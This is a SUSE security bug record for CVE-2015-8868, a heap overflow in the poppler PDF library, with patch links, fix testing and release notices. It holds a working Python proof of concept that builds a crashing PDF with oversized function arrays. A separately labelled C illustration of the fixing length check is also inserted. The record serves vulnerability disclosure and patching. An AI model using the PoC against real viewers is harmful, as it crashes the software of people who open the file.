Bug 976844 (CVE-2015-8868) - VUL-0: CVE-2015-8868: poppler: Corrupted PDF file can corrupt heap, causing DoS
Summary: VUL-0: CVE-2015-8868: poppler: Corrupted PDF file can corrupt heap, causing DoS
Status: RESOLVED FIXED
Alias: CVE-2015-8868
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware / OS: Other / Other
Importance: P3 - Medium (priority), Normal (severity)
Target Milestone: ---
Deadline: 2016-06-20
Assignee: Security Team bot
QA Contact: Security Team bot
Whiteboard: CVSSv2:SUSE:CVE-2015-8868:4.3:(AV:N/A...
Reported: 2016-04-22 12:47 UTC by Johannes Segitz
Modified: 2017-06-20 11:42 UTC

Attachments
poc (2.38 KB, application/x-gzip)
2016-04-22 12:47 UTC, Johannes Segitz
Description Johannes Segitz 2016-04-22 12:47:35 UTC
Created attachment 674223
poc

no CVE atm

From: Felipe

This is a clean heap overflow. Lib is used in evince and okular and for
preview in nautilus. Versions pre 0.40.0 are vulnerable.

The patch:
https://cgit.freedesktop.org/poppler/poppler/commit/?id=b3425dd3261679958cd56c0f71995c15d2124433


A crashy pdf file is attached.

PoC.py
from miniPDF.miniPDF import *
#from miniPDF.miniPDFO import *
import zlib

# The document
doc = PDFDoc()

# font
font = PDFDict()
font.add("Name", PDFName("F1"))
font.add("Subtype", PDFName("Type1"))
font.add("BaseFont", PDFName("Helvetica"))

# name:font map
fontname = PDFDict()
fontname.add("F1", font)

# resources
resources = PDFDict()
resources.add("Font", fontname)

# page content stream; the stray endstream/endobj/obj tokens inside the
# text string are part of the submitted input and are kept as-is
data = '''BT /F1 24 Tf 240 700 Td (Pedefe Pedefeito
endstream
endobj
obj 1 0
99
endobj
Pedefeon!) Tj
ET /GS3 gs'''

# contents
contentsDict = PDFDict()
contents = PDFStream({}, data)

length = PDFNum(len(data))
doc.add(length)
contents.add('Length', PDFRef(length))

# page
page = PDFDict()
page.add("Type", PDFName("Page"))
page.add("Resources", resources)
page.add("Contents", PDFRef(contents))

# pages
pages = PDFDict()
pages.add("Type", PDFName("Pages"))
pages.add("Kids", PDFArray([PDFRef(page)]))
pages.add("Count", PDFNum(1))

# add parent reference in page
page.add("Parent", PDFRef(pages))

# catalog
catalog = PDFDict()
catalog.add("Type", PDFName("Catalog"))
catalog.add("Pages", PDFRef(pages))

doc.add([catalog, pages, page, contents])
doc.setRoot(catalog)

# The Function thing: a Type 2 (exponential) function whose C0 and C1
# arrays are 10,000,000 entries long; an unpatched parser accepts that
# length and corrupts the heap (see the "wrong length" errors after the fix)
function = PDFDict()
function.add("FunctionType", PDFNum(2))
function.add("Domain", PDFArray([0, 1]))
function.add("N", PDFNum(100))
#2261634.5098039214
size = 10000000
function.add("C0", PDFArray([2261634.5098039214]*size))
function.add("C1", PDFArray([2261634.5098039214]*size))

# the function becomes the transfer function (TR) of ExtGState GS3, which
# the content stream selects with "/GS3 gs"
extgstate = PDFDict()
extgstate.add("Type", PDFName("ExtGState"))
extgstate.add("TR", function)

resources.add("ExtGState", "<< /GS3 " + str(extgstate) + ">>")

print(doc)
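An added illustration (not poppler's code and not part of the report) of the bug class and of the length check that rejects the PoC's oversized arrays: a Type 2 function's C0/C1 entries are copied into fixed-size per-function storage, so the copy must be bounded before it happens. FUNC_MAX_OUTPUTS is an assumed constant standing in for poppler's fixed output-array size; the error strings are the ones pdftops prints after the fix in Comment 2.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed upper bound on a PDF function's outputs; the fixed-size C0/C1
 * storage below is sized with it, as poppler's is with its own constant. */
#define FUNC_MAX_OUTPUTS 32

typedef struct {
    int n;                        /* number of outputs */
    double c0[FUNC_MAX_OUTPUTS];  /* fixed-size, inside a heap-allocated object */
    double c1[FUNC_MAX_OUTPUTS];
    const char *err;              /* last syntax error, or NULL */
} ExpFunction;

/* Build a Type 2 (exponential) function from already-parsed C0/C1 arrays.
 * Returns 0 on success, -1 on a syntax error (fn->err names the array).
 * The unchecked pattern was `for (i = 0; i < n0; i++) fn->c0[i] = c0[i];`
 * with n0 taken straight from the file: a C0 array longer than
 * FUNC_MAX_OUTPUTS then writes past the object, which is the heap
 * corruption this bug describes. The two checks below prevent that. */
int exp_function_load(ExpFunction *fn, const double *c0, size_t n0,
                      const double *c1, size_t n1)
{
    memset(fn, 0, sizeof *fn);
    if (n0 == 0 || n0 > FUNC_MAX_OUTPUTS) {
        fn->err = "Function's C0 array is wrong length";
        return -1;
    }
    if (n1 != n0) {                 /* C1 must pair with C0 entry for entry */
        fn->err = "Function's C1 array is wrong length";
        return -1;
    }
    fn->n = (int)n0;
    memcpy(fn->c0, c0, n0 * sizeof *c0);
    memcpy(fn->c1, c1, n1 * sizeof *c1);
    return 0;
}

int main(void)
{
    ExpFunction fn;
    double big[FUNC_MAX_OUTPUTS + 1] = {0};  /* one entry past the storage */
    size_t n = sizeof big / sizeof *big;
    if (exp_function_load(&fn, big, n, big, n) != 0)
        printf("rejected: %s\n", fn.err);   /* prints the C0 error */
    return 0;
}
```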
Comment 1 Swamp Workflow Management 2016-04-22 22:00:24 UTC
bugbot adjusting priority
Comment 2 Petr Gajdos 2016-04-29 10:39:53 UTC
Tested with 11 and 13.2:

Packages installed: poppler-tools, libpoppler*

BEFORE

$ pdftops crash.pdf 
Segmentation fault (core dumped)
$

AFTER

$ pdftops crash.pdf
Syntax Error: Function's C0 array is wrong length
Syntax Error: Function's C1 array is wrong length
Syntax Error: Function's C0 array is wrong length
Syntax Error: Function's C1 array is wrong length
$
Comment 3 Petr Gajdos 2016-04-29 10:45:27 UTC
Packages submitted.
Comment 5 Bernhard Wiedemann 2016-04-29 11:00:20 UTC
This is an autogenerated message for OBS integration:
This bug (976844) was mentioned in
https://build.opensuse.org/request/show/392089 13.2 / poppler
Comment 6 Swamp Workflow Management 2016-05-17 19:08:35 UTC
openSUSE-SU-2016:1322-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 976844
CVE References: CVE-2015-8868
Sources used:
openSUSE 13.2 (src):    poppler-0.26.5-6.1, poppler-qt-0.26.5-6.1, poppler-qt5-0.26.5-6.1
Comment 7 Swamp Workflow Management 2016-06-06 10:47:17 UTC
An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2016-06-20.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/62801
Comment 8 Swamp Workflow Management 2016-06-10 18:08:01 UTC
SUSE-SU-2016:1543-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 976844
CVE References: CVE-2015-8868
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
SUSE Linux Enterprise Software Development Kit 12 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
SUSE Linux Enterprise Server 12-SP1 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
SUSE Linux Enterprise Server 12 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
SUSE Linux Enterprise Desktop 12 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1
Comment 9 Swamp Workflow Management 2016-06-10 18:08:20 UTC
SUSE-SU-2016:1544-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 976844
CVE References: CVE-2015-8868
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    poppler-0.12.3-1.12.1
SUSE Linux Enterprise Server 11-SP4 (src):    poppler-0.12.3-1.12.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    poppler-0.12.3-1.12.1
Comment 10 Swamp Workflow Management 2016-06-19 15:08:46 UTC
openSUSE-SU-2016:1630-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 976844
CVE References: CVE-2015-8868
Sources used:
openSUSE Leap 42.1 (src):    poppler-0.24.4-12.1, poppler-qt-0.24.4-12.1, poppler-qt5-0.24.4-12.1
Comment 11 Marcus Meissner 2017-06-20 11:42:45 UTC
released